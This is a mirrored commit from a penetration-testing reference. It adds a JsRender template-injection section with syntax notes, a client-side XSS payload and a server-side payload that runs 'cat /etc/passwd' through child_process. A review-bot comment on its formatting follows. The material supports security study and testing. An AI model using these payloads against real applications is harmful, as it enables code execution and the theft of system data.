mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
af1cb68098
commit
77cd9471fb
1 changed files with 27 additions and 0 deletions
@ -220,6 +220,33 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
### JsRender \(NodeJS\)
| **Template** | **Description** |
| :--- | :--- |
| {{: …}} | Evaluate and render output |
| {{> …}} | Evaluate and render HTML encoded output |
| {{!– … –}} | Comment |
| {{\* …}} and {{\*: …}} | Allow code \(disabled by default\) |
* {{:7\*7}} = 49
#### Client Side
```text
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
#### Server Side
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
#### More information
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
### ERB \(Ruby\)
* `{{7*7}} = {{7*7}}`
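Review bot: the comment row of the new JsRender table, `{{!– … –}}`, uses typographic en dashes, while JsRender's comment tag is written with two ASCII hyphens (`{{!-- … --}}`); as rendered, the row documents a tag the engine does not recognise, so the dashes should be replaced. Two smaller points in the same hunk: the "Server Side" block is fenced as ```bash although its content is a JsRender template expression rather than a shell command, so the fence should be ```text like the "Client Side" block above it; and the client-side payload is shown URL-encoded (`%22`, `%27`) while the server-side one is plain, so the section should state which form is meant to be placed into the template, or show both blocks in the same encoding, to avoid the two reading as different syntaxes.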